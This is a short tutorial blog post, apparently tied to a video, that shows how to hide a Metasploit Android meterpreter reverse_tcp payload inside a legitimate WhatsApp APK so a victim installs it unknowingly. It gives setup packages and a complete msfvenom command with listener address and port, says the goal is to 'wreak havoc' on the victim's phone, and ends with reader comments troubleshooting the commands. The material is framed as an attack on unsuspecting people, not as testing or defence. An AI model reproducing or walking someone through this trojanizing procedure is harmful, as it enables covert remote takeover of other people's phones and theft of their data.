[sc name=”ad_1″]
Hey Guys, In this video i show you how to Embed a Metasploit Payload in an Original .Apk File.
Normally we have to install the payload in the victims phone by any means we can, and when the victim runs the application, we would get a direct connection to our victim’s phone remotely and we can use it to wreak havoc on that phone.
But since the app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.
Requirements:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1 apktool
msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 -o WhatsApp-backdoored.apk
[sc name=”ad-in-article”]
Video:
https://youtu.be/_UZlgN28SxY
Hey ,
I’m getting error.
When I tired to run first command
E:Unable to locate package lib32ncurses5
For the second command
Error: invalid payload : andriod/meterpreter/reverse_tcp
I have tired for the all payloads andriod/meterpreter/reverse_http so.but I ‘m getting the same.please help me to solve this.
The first one, it’s not lib32ncurses5 it’s libncurses5
the second one there is a typo
android/meterpreter/reverse_tcp
Bro Error:invalid option